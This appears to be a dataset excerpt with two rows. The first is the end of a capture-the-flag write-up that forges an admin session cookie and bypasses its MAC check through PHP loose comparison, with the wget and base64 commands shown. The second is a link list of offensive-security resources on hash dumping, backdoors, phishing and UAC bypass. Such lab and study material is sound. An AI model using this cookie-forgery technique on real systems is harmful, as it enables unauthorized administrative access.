request?\n\n```\nhttp://www.restapitutorial.com/lessons/httpmethods.html\n```\n\n```\n$ wget http://88.198.233.174:37337\n--2017-12-27 02:54:18-- http://88.198.233.174:37337/\nConnecting to 88.198.233.174:37337... connected.\nHTTP request sent, awaiting response... 403 Forbidden\n2017-12-27 02:54:19 ERROR 403: Forbidden.\n\n$ wget --post-data \"username=mytest\" http://88.198.233.174:37337\n--2017-12-27 02:55:22-- http://88.198.233.174:37337/\nConnecting to 88.198.233.174:37337... connected.\nHTTP request sent, awaiting response... 403 Forbidden\n2017-12-27 02:55:23 ERROR 403: Forbidden.\n```\n\nHitting `/` with the `POST` request didn't yield anything, but hitting\n`index.php` did!\n\n```\n$ wget --post-data \"username=mytest\" http://88.198.233.174:37337/index.php\n--2018-01-13 23:05:05-- http://88.198.233.174:37337/index.php\nConnecting to 88.198.233.174:37337... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 274 [text/html]\nSaving to: ‘index.php’\n\nindex.php 100%[===================>] 274 --.-KB/s in 0s \n\n2018-01-13 23:05:06 (40.0 MB/s) - ‘index.php’ saved [382]\n```\n\n```\n$ cat index.php\n\n\n\n
\nChange Username:
\n\n\n\n
\n\n\n\n\n\n\nnot an admin (yet)\n```\n\n\n\nLet's take a closer look at the server response to our POST request using\n`Postman`..\n\n\n\n\n```\n\nContent-Encoding: gzip\n\nContent-Length: 274\n\nContent-Type: text/html; charset=UTF-8\n\nDate: Sun, 14 Jan 2018 04:41:35 GMT\n\nServer: Apache/2.4.18 (Ubuntu)\n\nSet-Cookie: ses=eyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IkZhbHNlIiwiTUFDIjoiZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWQifQ%3D%3D\n\nVary: Accept-Encoding\n\n\n\n\n
\nChange Username:
\n\n\n\n
\n\n\n\n\n\n\nnot an admin (yet)\n
\n```\n\nInteresting.. so there is a cookie that is also returned which always appears to\nbe the same value even for subsequent POST requests.\n\n### C IS FOR COOKIE\n\nLet's see if we can decode this cookie..\n\n```\nORIGINAL\n\nses=eyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IkZhbHNlIiwiTUFDIjoiZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWQifQ%3D%3D\n```\n\n```\nURL DECODED\n\nses=eyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IkZhbHNlIiwiTUFDIjoiZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWQifQ==\n```\n\n```\nBASE64 DECODED\n\n$ echo \"eyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IkZhbHNlIiwiTUFDIjoiZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWQifQ==\" | base64 -D\n{\"User\":\"whocares\",\"Admin\":\"False\",\"MAC\":\"ff6d0a568d61e5a03bcdb04509d5885d\"}\n```\n\nHm.. is it as simple as manipulating the \"Admin\" flag and sending the cookie\nas part of the POST request?\n\n### NEW COOKIE (ADMIN:TRUE)\n\nLet's try crafting a new cookie with the \"Admin\" flag flipped to \"True\" and see\nwhat happens.\n\n```\nBASE64 ENCODED\n\n$ echo \"{\"User\":\"whocares\",\"Admin\":\"True\",\"MAC\":\"ff6d0a568d61e5a03bcdb04509d5885d\"}\" | base64\ne1VzZXI6d2hvY2FyZXMsQWRtaW46VHJ1ZSxNQUM6ZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWR9Cg==\n```\n\n```\nURL ENCODED COOKIE\nses=e1VzZXI6d2hvY2FyZXMsQWRtaW46VHJ1ZSxNQUM6ZmY2ZDBhNTY4ZDYxZTVhMDNiY2RiMDQ1MDlkNTg4NWR9Cg%3D%3D\n```\n\n\n\nOoooh.. we got a different message this time!\n\n```\nyou've fucked something up\n```\n\nLooking more closely at the generated cookie value, I realized that I was\nencoding a newline at the end and I shouldn't be. Trying the above steps again\nwith the newline-free cookie we get a different error message!\n\n```\n$ echo -n '{\"User\":\"whocares\",\"Admin\":\"True\",\"MAC\":\"ff6d0a568d61e5a03bcdb04509d5885d\"}' | base64\neyJVc2VyIjoid2hvY2FyZXMiLCJBZG1pbiI6IlRydWUiLCJNQUMiOiJmZjZkMGE1NjhkNjFlNWEwM2JjZGIwNDUwOWQ1ODg1ZCJ9\n```\n\n\n\n```\nwhat are you trying to do huh?\n```\n\n### NEW COOKIE II (USER:ADMIN, ADMIN:TRUE)\n\nLet's play with the \"User\" flag as well?\n\n```\n$ echo -n '{\"User\":\"Admin\",\"Admin\":\"True\",\"MAC\":\"ff6d0a568d61e5a03bcdb04509d5885d\"}' | base64\neyJVc2VyIjoiQWRtaW4iLCJBZG1pbiI6IlRydWUiLCJNQUMiOiJmZjZkMGE1NjhkNjFlNWEwM2JjZGIwNDUwOWQ1ODg1ZCJ9\n```\n\n```\nURL ENCODED COOKIE\nses=eyJVc2VyIjoiQWRtaW4iLCJBZG1pbiI6IlRydWUiLCJNQUMiOiJmZjZkMGE1NjhkNjFlNWEwM2JjZGIwNDUwOWQ1ODg1ZCJ9\n```\n\nHm.. still the same \"what are you trying to do huh?\" response as when we just\nfiddled with the `Admin` flag.\n\n### NEW COOKIE III (USER:ADMIN, ADMIN:TRUE, MAC:???)\n\nOkay. so it looks like we need to fool the MAC field?\n\n```\nhttps://en.wikipedia.org/wiki/Hash-based_message_authentication_code\n\nIn cryptography, a keyed-hash message authentication code (HMAC) is a specific\ntype of message authentication code (MAC) involving a cryptographic hash\nfunction and a secret cryptographic key. It may be used to simultaneously verify\nboth the data integrity and the authentication of a message, as with any MAC. \n```\n\nResearching around (i.e. Google), came across the topic of `type juggling`\nwith `PHP` that might be interesting to try..\n\n```\nLaravel Cryptographic MAC Bypass\nhttps://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf\n\nA Laravel \"encryption payload\" looks like this:\n{\n \"iv\": \"137f87545d8d2f994c65a6f336507747\",\n \"value\": \"c30fbe54e025b2a509db7a1fc174783c35d023199f9a0e24ae23a934277aec66\"\n \"mac\": \"68f6611d14aa021a80c3fc09c638de6de12910486c0c82703315b5d83b8229bb\",\n}\n\nThe MAC check code looked like this:\n\n$payload = json_decode(base64_decode($payload), true);\nif ($payload['mac'] != hash_hmac('sha256', $payload['value'], $this->key))\n throw new DecryptException(\"MAC for payload is invalid.\");\n\nThe calculated MAC (i.e. the result of hash_hmac()) is a string containing\nhexadecimal characters.\n\nThe use of a loose comparison means that if an integer was provided in the JSON\npayload, the HMAC string will be juggled to a number\n\n- \"7a5c2...72c933\" == int(7)\n- \"68f66...8229bb\" == int(68)\n- \"092d1...c410a9\" == int(92)\n\nIf the calculated MAC is \"68f66...8229bb\" then the following payload will pass\nthe MAC check:\n{\n \"iv\": \"137f87545d8d2f994c65a6f336507747\",\n \"value\": \"c30fbe54e025b2a509db7a1fc174783c35d023199f9a0e24ae23a934277aec66\"\n \"mac\": 68,\n}\n\nThe MAC bug allows an attacker to submit arbitrary ciphertexts and IV's which\nare processed by the server in CBC mode.\n```\n\nSo let's try changing the `MAC` field to an integer instead of a string to see\nif the validation code is vulnerable to \"loose comparison\".. but what integer\nto use?\n\n\n\nIf the MAC field is a string, the table appears to suggest that `if (\"str\"==0)`\nwould resolve to `true`, so if we feed in a MAC of `0`.. would that make the\ncomparison always work?\n\n```\n$ echo '{\"User\":\"Admin\",\"Admin\":\"True\",\"MAC\":0}' | base64\neyJVc2VyIjoiQWRtaW4iLCJBZG1pbiI6IlRydWUiLCJNQUMiOjB9Cg==\n```\n```\nURL ENCODED\nses=eyJVc2VyIjoiQWRtaW4iLCJBZG1pbiI6IlRydWUiLCJNQUMiOjB9Cg%3D%3D\n```\n\n\n\n.. weeeeeeeeeeeeeeeeeeeeee.... that worked!\n"}}},{"rowIdx":316,"cells":{"text":{"kind":"string","value":"\n\n-1- 3 Ways Extract Password Hashes from NTDS.dit:\n\n\nhttps://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit\n\n\n-2- 3 ways to Capture HTTP Password in Network PC:\n\n\nhttps://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/\n\n\n-3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cowpatty:\n\n\nwww.hackingarticles.in/3-ways-crack-wifi-using-pyrit-oclhashcat-cowpatty/\n\n\n-4-BugBounty @ Linkedln-How I was able to bypass Open Redirection Protection:\n\n\nhttps://medium.com/p/2e143eb36941\n\n\n-5-BugBounty — “Let me reset your password and login into your account “-How I was able to Compromise any User Account via Reset Password Functionality:\n\n\nhttps://medium.com/p/a11bb5f863b3/share/twitter\n\n\n-6-“Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company:\n\n\nhttps://medium.com/p/a69afe5a0899\n\n\n-7-BugBounty — “I don’t need your current password to login into your account” - How could I completely takeover any user’s account in an online classi ed ads company:\n\n\nhttps://medium.com/p/e51a945b083d\n\n\n-8-BugBounty — “How I was able to shop for free!”- Payment Price Manipulation:\n\n\nhttps://medium.com/p/b29355a8e68e\n\n\n-9-Recon — my way:\n\n\nhttps://medium.com/p/82b7e5f62e21\n\n\n-10-Reconnaissance: a eulogy in three acts:\n\n\nhttps://medium.com/p/7840824b9ef2\n\n\n-11-Red-Teaming-Toolkit:\n\n\nhttps://github.com/infosecn1nja/Red-Teaming-Toolkit\n\n\n-12-Red Team Tips:\n\n\nhttps://vincentyiu.co.uk/\n\n\n-13-Shellcode: A reverse shell for Linux in C with support for TLS/SSL:\n\n\nhttps://modexp.wordpress.com/2019/04/24/glibc-shellcode/\n\n\n-14-Shellcode: Encrypting traffic:\n\n\nhttps://modexp.wordpress.com/2018/08/17/shellcode-encrypting-traffic/\n\n\n-15-Penetration Testing of an FTP Server:\n\n\nhttps://medium.com/p/19afe538be4b\n\n\n-16-Reverse Engineering of the Anubis Malware — Part 1:\n\n\nhttps://medium.com/p/741e12f5a6bd\n\n\n-17-Privilege Escalation on Linux with Live examples:\n\n\nhttps://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/\n\n\n-18-Pentesting Cheatsheets:\n\n\nhttps://ired.team/offensive-security-experiments/offensive-security-cheetsheets\n\n\n-19-Powershell Payload Delivery via DNS using Invoke-PowerCloud:\n\n\nhttps://ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud\n\n\n-20-SMART GOOGLE SEARCH QUERIES TO FIND VULNERABLE SITES – LIST OF 4500+ GOOGLE DORKS:\n\n\nhttps://sguru.org/ghdb-download-list-4500-google-dorks-free/\n\n\n-21-SQL Injection Cheat Sheet:\n\n\nhttps://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/\n\n\n-22-SQLmap’s os-shell + Backdooring website with Weevely:\n\n\nhttps://medium.com/p/8cb6dcf17fa4\n\n\n-23-SQLMap Tamper Scripts (SQL Injection and WAF bypass) Tips:\n\n\nhttps://medium.com/p/c5a3f5764cb3\n\n\n-24-Top 10 Essential NMAP Scripts for Web App Hacking:\n\n\nhttps://medium.com/p/c7829ff5ab7\n\n\n-25-BugBounty — How I was able to download the Source Code of India’s Largest Telecom Service Provider including dozens of more popular websites!:\n\n\nhttps://medium.com/p/52cf5c5640a1\n\n\n-26-Re ected XSS Bypass Filter:\n\n\nhttps://medium.com/p/de41d35239a3\n\n\n-27-XSS Payloads, getting past alert(1):\n\n\nhttps://medium.com/p/217ab6c6ead7\n\n\n-28-XS-Searching Google’s bug tracker to find out vulnerable source code Or how side-channel timing attacks aren’t that impractical:\n\n\nhttps://medium.com/p/50d8135b7549\n\n\n-29-Web Application Firewall (WAF) Evasion Techniques:\n\n\nhttps://medium.com/@themiddleblue/web-application-firewall-waf-evasion-techniques\n\n\n-30-OSINT Resources for 2019:\n\n\nhttps://medium.com/p/b15d55187c3f\n\n\n-31-The OSINT Toolkit:\n\n\nhttps://medium.com/p/3b9233d1cdf9\n\n\n-32-OSINT : Chasing Malware + C&C Servers:\n\n\nhttps://medium.com/p/3c893dc1e8cb\n\n\n-33-OSINT tool for visualizing relationships between domains, IPs and email addresses:\n\n\nhttps://medium.com/p/94377aa1f20a\n\n\n-34-From OSINT to Internal – Gaining Access from outside the perimeter:\n\n\nhttps://www.n00py.io/.../from-osint-to-internal-gaining-access-from-the-outside-the-perimeter\n\n\n-35-Week in OSINT #2018–35:\n\n\nhttps://medium.com/p/b2ab1765157b\n\n\n-36-Week in OSINT #2019–14:\n\n\nhttps://medium.com/p/df83f5b334b4\n\n\n-37-Instagram OSINT | What A Nice Picture:\n\n\nhttps://medium.com/p/8f4c7edfbcc6\n\n\n-38-awesome-osint:\n\n\nhttps://github.com/jivoi/awesome-osint\n\n\n-39-OSINT_Team_Links:\n\n\nhttps://github.com/IVMachiavelli/OSINT_Team_Links\n\n\n-40-Open-Source Intelligence (OSINT) Reconnaissance:\n\n\nhttps://medium.com/p/75edd7f7dada\n\n\n-41-Hacking Cryptocurrency Miners with OSINT Techniques:\n\n\nhttps://medium.com/p/677bbb3e0157\n\n\n-42-A penetration tester’s guide to sub- domain enumeration:\n\n\nhttps://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6?gi=f44ec9d8f4b5\n\n\n-43-Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages:\n\n\nhttps://blackarch.org/recon.html\n\n\n-44-What tools I use for my recon during BugBounty:\n\n\nhttps://medium.com/p/ec25f7f12e6d\n\n\n-45-Command and Control – DNS:\n\n\nhttps://pentestlab.blog/2017/09/06/command-and-control-dns/\n\n\n-46-Command and Control – WebDAV:\n\n\nhttps://pentestlab.blog/2017/09/12/command-and-control-webdav/\n\n\n\n\n-47-Command and Control – Twitter:\n\n\nhttps://pentestlab.blog/2017/09/26/command-and-control-twitter/\n\n\n-48-Command and Control – Kernel:\n\n\nhttps://pentestlab.blog/2017/10/02/command-and-control-kernel/\n\n\n-49-Source code disclosure via exposed .git folder:\n\n\nhttps://pentester.land/tutorials/.../source-code-disclosure-via-exposed-git-folder.html\n\n\n-50-Pentesting Cheatsheet:\n\n\nhttps://hausec.com/pentesting-cheatsheet/\n\n\n\n-51-Windows Userland Persistence Fundamentals:\n\n\nhttps://www.fuzzysecurity.com/tutorials/19.html\n\n\n-52-A technique that a lot of SQL injection beginners don’t know | Atmanand Nagpure write-up:\n\n\nhttps://medium.com/p/abdc7c269dd5\n\n\n-53-awesome-bug-bounty:\n\n\nhttps://github.com/djadmin/awesome-bug-bounty\n\n\n-54-dostoevsky-pentest-notes:\n\n\nhttps://github.com/dostoevskylabs/dostoevsky-pentest-notes\n\n\n-55-awesome-pentest:\n\n\nhttps://github.com/enaqx/awesome-pentest\n\n\n-56-awesome-windows-exploitation:\n\n\nhttps://github.com/enddo/awesome-windows-exploitation\n\n\n-57-awesome-exploit-development:\n\n\nhttps://github.com/FabioBaroni/awesome-exploit-development\n\n\n\n-58-BurpSuit + SqlMap = One Love:\n\n\nhttps://medium.com/p/64451eb7b1e8\n\n\n-59-Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat:\n\n\nhttps://medium.com/p/a5a5d3ffea46\n\n\n-60-DLL Injection:\n\n\nhttps://pentestlab.blog/2017/04/04/dll-injection\n\n\n-61-DLL Hijacking:\n\n\nhttps://pentestlab.blog/2017/03/27/dll-hijacking\n\n\n-62-My Recon Process — DNS Enumeration:\n\n\nhttps://medium.com/p/d0e288f81a8a\n\n\n-63-Google Dorks for nding Emails, Admin users etc:\n\n\nhttps://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc\n\n\n-64-Google Dorks List 2018:\n\n\nhttps://medium.com/p/fb70d0cbc94\n\n\n-65-Hack your own NMAP with a BASH one-liner:\n\n\nhttps://medium.com/p/758352f9aece\n\n\n-66-UNIX / LINUX CHEAT SHEET:\n\n\ncheatsheetworld.com/programming/unix-linux-cheat-sheet/\n\n\n-67-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced:\n\n\nhttps://medium.com/p/74d2bec02099\n\n\n-68- information gathering:\n\n\nhttps://pentestlab.blog/category/information-gathering/\n\n\n-69-post exploitation:\n\n\nhttps://pentestlab.blog/category/post-exploitation/\n\n\n\n-70-privilege escalation:\n\n\nhttps://pentestlab.blog/category/privilege-escalation/\n\n\n-71-red team:\n\n\nhttps://pentestlab.blog/category/red-team/\n\n\n-72-The Ultimate Penetration Testing Command Cheat Sheet for Linux:\n\n\nhttps://www.hackingloops.com/command-cheat-sheet-for-linux/\n\n\n-73-Web Application Penetration Testing Cheat Sheet:\n\n\nhttps://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/\n\n\n-74-Windows Kernel Exploits:\n\n\nhttps://pentestlab.blog/2017/04/24/windows-kernel-exploits\n\n\n-75-Windows oneliners to download remote payload and execute arbitrary code:\n\n\nhttps://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/\n\n\n-76-Windows-Post-Exploitation:\n\n\nhttps://github.com/emilyanncr/Windows-Post-Exploitation\n\n\n-77-Windows Post Exploitation Shells and File Transfer with Netcat for Windows:\n\n\nhttps://medium.com/p/a2ddc3557403\n\n\n-78-Windows Privilege Escalation Fundamentals:\n\n\nhttps://www.fuzzysecurity.com/tutorials/16.html\n\n\n-79-Windows Privilege Escalation Guide:\n\nwww.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\n\n\n\n-80-Windows Active Directory Post Exploitation Cheatsheet:\n\n\nhttps://medium.com/p/48c2bd70388\n\n\n-81-Windows Exploitation Tricks: Abusing the User-Mode Debugger:\n\n\nhttps://googleprojectzero.blogspot.com/2019/04/windows-exploitation-tricks-abusing.html\n\n\n-82-VNC Penetration Testing (Port 5901):\n\n\nhttp://www.hackingarticles.in/vnc-penetration-testing\n\n\n-83- Big List Of Google Dorks Hacking:\n\n\nhttps://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking\n\n\n-84-List of google dorks for sql injection:\n\n\nhttps://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/\n\n\n-85-Download Google Dorks List 2019:\n\n\nhttps://medium.com/p/323c8067502c\n\n\n-86-Comprehensive Guide to Sqlmap (Target Options):\n\n\nhttp://www.hackingarticles.in/comprehensive-guide-to-sqlmap-target-options15249-2\n\n\n-87-EMAIL RECONNAISSANCE AND PHISHING TEMPLATE GENERATION MADE SIMPLE:\n\n\nwww.cybersyndicates.com/.../email-reconnaissance-phishing-template-generation-made-simple\n\n\n-88-Comprehensive Guide on Gobuster Tool:\n\n\nhttps://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/\n\n\n-89-My Top 5 Web Hacking Tools:\n\n\nhttps://medium.com/p/e15b3c1f21e8\n\n\n-90-[technical] Pen-testing resources:\n\n\nhttps://medium.com/p/cd01de9036ad\n\n\n-91-File System Access on Webserver using Sqlmap:\n\n\nhttp://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap\n\n\n-92-kali-linux-cheatsheet:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-93-Pentesting Cheatsheet:\n\n\nhttps://anhtai.me/pentesting-cheatsheet/\n\n\n\n-94-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd):\n\n\nhttp://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa\n\n\n-95-XSS Payload List - Cross Site Scripting Vulnerability Payload List:\n\n\nhttps://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html\n\n\n-96-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection:\n\n\nhttps://www.notsosecure.com/analyzing-cve-2018-6376/\n\n\n-97-Exploiting Sql Injection with Nmap and Sqlmap:\n\n\nhttp://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap\n\n\n-98-awesome-malware-analysis:\n\n\nhttps://github.com/rshipp/awesome-malware-analysis\n\n\n-99-Anatomy of UAC Attacks:\n\n\nhttps://www.fuzzysecurity.com/tutorials/27.html\n\n\n-100-awesome-cyber-skills:\n\n\nhttps://github.com/joe-shenouda/awesome-cyber-skills\n\n\n-101-5 ways to Banner Grabbing:\n\n\nhttp://www.hackingarticles.in/5-ways-banner-grabbing\n\n\n-102-6 Ways to Hack PostgresSQL Login:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-postgressql-login\n\n\n-103-6 Ways to Hack SSH Login Password:\n\n\nhttp://www.hackingarticles.in/6-ways-to-hack-ssh-login-password\n\n\n-104-10 Free Ways to Find Someone’s Email Address:\n\n\nhttps://medium.com/p/e6f37f5fe10a\n\n\n-105-USING A SCF FILE TO GATHER HASHES:\n\n\nhttps://1337red.wordpress.com/using-a-scf-file-to-gather-hashes\n\n\n-106-Hack Remote Windows PC using DLL Files (SMB Delivery Exploit):\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-pc-using-dll-files-smb-delivery-exploit\n\n\n107-Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities:\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-hijack-vulnerabilities\n\n\n-108-BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs):\n\n\nhttps://medium.com/p/ef6542301c65\n\n\n-109-How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information:\n\n\nhttps://gbhackers.com/external-black-box-penetration-testing\n\n\n-110-A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals:\n\n\nhttps://gbhackers.com/hacking-tools-list\n\n\n-111-Most Important Considerations with Malware Analysis Cheats And Tools list:\n\n\nhttps://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list\n\n\n-112-Awesome-Hacking:\n\n\nhttps://github.com/Hack-with-Github/Awesome-Hacking\n\n\n-113-awesome-threat-intelligence:\n\n\nhttps://github.com/hslatman/awesome-threat-intelligence\n\n\n-114-awesome-yara:\n\n\nhttps://github.com/InQuest/awesome-yara\n\n\n-115-Red-Team-Infrastructure-Wiki:\n\n\nhttps://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki\n\n\n-116-awesome-pentest:\n\n\nhttps://github.com/enaqx/awesome-pentest\n\n\n-117-awesome-cyber-skills:\n\n\nhttps://github.com/joe-shenouda/awesome-cyber-skills\n\n\n-118-pentest-wiki:\n\n\nhttps://github.com/nixawk/pentest-wiki\n\n\n-119-awesome-web-security:\n\n\nhttps://github.com/qazbnm456/awesome-web-security\n\n\n-120-Infosec_Reference:\n\n\nhttps://github.com/rmusser01/Infosec_Reference\n\n\n-121-awesome-iocs:\n\n\nhttps://github.com/sroberts/awesome-iocs\n\n\n-122-blackhat-arsenal-tools:\n\n\nhttps://github.com/toolswatch/blackhat-arsenal-tools\n\n\n-123-awesome-social-engineering:\n\n\nhttps://github.com/v2-dev/awesome-social-engineering\n\n\n-124-Penetration Testing Framework 0.59:\n\n\nwww.vulnerabilityassessment.co.uk/Penetration%20Test.html\n\n\n-125-Penetration Testing Tools Cheat Sheet :\n\n\nhttps://highon.coffee/blog/penetration-testing-tools-cheat-sheet/\n\n\n-126-SN1PER – A Detailed Explanation of Most Advanced Automated Information Gathering & Penetration Testing Tool:\n\n\nhttps://gbhackers.com/sn1per-a-detailed-explanation-of-most-advanced-automated-information-gathering-penetration-testing-tool\n\n\n\n-127-Spear Phishing 101:\n\n\nhttps://blog.inspired-sec.com/archive/2017/05/07/Phishing.html\n\n\n-128-100 ways to discover (part 1):\n\n\nhttps://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/\n\n\n-129-Comprehensive Guide to SSH Tunnelling:\n\n\nhttp://www.hackingarticles.in/comprehensive-guide-to-ssh-tunnelling/\n\n\n-130-Capture VNC Session of Remote PC using SetToolkit:\n\n\nhttp://www.hackingarticles.in/capture-vnc-session-remote-pc-using-settoolkit/\n\n\n-131-Hack Remote PC using PSEXEC Injection in SET Toolkit:\n\n\nhttp://www.hackingarticles.in/hack-remote-pc-using-psexec-injection-set-toolkit/\n\n\n\n\n-132-Denial of Service Attack on Network PC using SET Toolkit:\n\n\nhttp://www.hackingarticles.in/denial-of-service-attack-on-network-pc-using-set-toolkit/\n\n\n\n-133-Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit:\n\n\nhttp://www.hackingarticles.in/hack-gmail-and-facebook-of-remote-pc-using-dns-spoofing-and-set-toolkit/\n\n\n-134-Hack Any Android Phone with DroidJack (Beginner’s Guide):\n\n\nhttp://www.hackingarticles.in/hack-android-phone-droidjack-beginners-guide/\n\n\n-135-HTTP RAT Tutorial for Beginners:\n\n\nhttp://www.hackingarticles.in/http-rat-tutorial-beginners/\n\n\n-136-5 ways to Create Permanent Backdoor in Remote PC:\n\n\nhttp://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/\n\n\n-137-How to Enable and Monitor Firewall Log in Windows PC:\n\n\nhttp://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/\n\n\n-138-EMPIRE TIPS AND TRICKS:\n\n\nhttps://enigma0x3.net/2015/08/26/empire-tips-and-tricks/\n\n\n-139-CSRF account takeover Explained Automated/Manual:\n\n\nhttps://medium.com/p/447e4b96485b\n\n\n-140-CSRF Exploitation using XSS:\n\n\nhttp://www.hackingarticles.in/csrf-exploitation-using-xss\n\n\n-141-Dumping Domain Password Hashes:\n\n\nhttps://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/\n\n\n-142-Empire Post Exploitation – Unprivileged Agent to DA Walkthrough:\n\n\nhttps://bneg.io/2017/05/24/empire-post-exploitation/\n\n\n-143-Dropbox for the Empire:\n\n\nhttps://bneg.io/2017/05/13/dropbox-for-the-empire/\n\n\n-144-Empire without PowerShell.exe:\n\n\nhttps://bneg.io/2017/07/26/empire-without-powershell-exe/\n\n\n-145-REVIVING DDE: USING ONENOTE AND EXCEL FOR CODE EXECUTION:\n\n\nhttps://enigma0x3.net/2018/01/29/reviving-dde-using-onenote-and-excel-for-code-execution/\n\n\n-146-PHISHING WITH EMPIRE:\n\n\nhttps://enigma0x3.net/2016/03/15/phishing-with-empire/\n\n\n-146-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP:\n\n\nhttps://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n\n\n-147-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND REGISTRY HIJACKING:\n\n\nhttps://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n\n\n-148-“FILELESS” UAC BYPASS USING SDCLT.EXE:\n\n\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\n\n\n-149-PHISHING AGAINST PROTECTED VIEW:\n\n\nhttps://enigma0x3.net/2017/07/13/phishing-against-protected-view/\n\n\n-150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM:\n\n\nhttps://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/\n\n\n-151-enum4linux Cheat Sheet:\n\n\nhttps://highon.coffee/blog/enum4linux-cheat-sheet/\n\n\n-152-enumeration:\n\n\nhttps://technologyredefine.blogspot.com/2017/11/enumeration.html\n\n\n-153-Command and Control – WebSocket:\n\n\nhttps://pentestlab.blog/2017/12/06/command-and-control-websocket\n\n\n-154-Command and Control – WMI:\n\nhttps://pentestlab.blog/2017/11/20/command-and-control-wmi\n\n\n-155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus:\n\n\nhttp://thelearninghacking.com/create-virus-hack-windows/\n\n\n-156-Comprehensive Guide to Nmap Port Status:\n\n\nhttp://www.hackingarticles.in/comprehensive-guide-nmap-port-status\n\n\n-157-Commix – Automated All-in-One OS Command Injection and Exploitation Tool:\n\n\nhttps://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool\n\n\n-158-Compromising Jenkins and extracting credentials:\n\n\nhttps://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/\n\n\n-159-footprinting:\n\n\nhttps://technologyredefine.blogspot.com/2017/09/footprinting_17.html\n\n\n-160-awesome-industrial-control-system-security:\n\n\nhttps://github.com/hslatman/awesome-industrial-control-system-security\n\n\n-161-xss-payload-list:\n\n\nhttps://github.com/ismailtasdelen/xss-payload-list\n\n\n-162-awesome-vehicle-security:\n\nhttps://github.com/jaredthecoder/awesome-vehicle-security\n\n\n-163-awesome-osint:\n\n\nhttps://github.com/jivoi/awesome-osint\n\n\n-164-awesome-python:\n\n\nhttps://github.com/vinta/awesome-python\n\n\n-165-Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit):\n\n\nhttps://www.exploit-db.com/download/44830.rb\n\n\n-166-nbtscan Cheat Sheet:\n\n\nhttps://highon.coffee/blog/nbtscan-cheat-sheet/\n\n\n-167-neat-tricks-to-bypass-csrfprotection:\n\n\nwww.slideshare.net/0ang3el/neat-tricks-to-bypass-csrfprotection\n\n\n-168-ACCESSING CLIPBOAR D FROM THE LOC K SC REEN IN WI NDOWS 10 #2:\n\n\nhttps://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/\n\n\n-169-NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts):\n\n\nhttps://medium.com/p/868a7bd7f692\n\n\n-170-Nmap Cheat Sheet:\n\nhttps://highon.coffee/blog/nmap-cheat-sheet/\n\n\n-171-Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV:\n\n\nhttps://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/\n\n\n-172-Phishing with 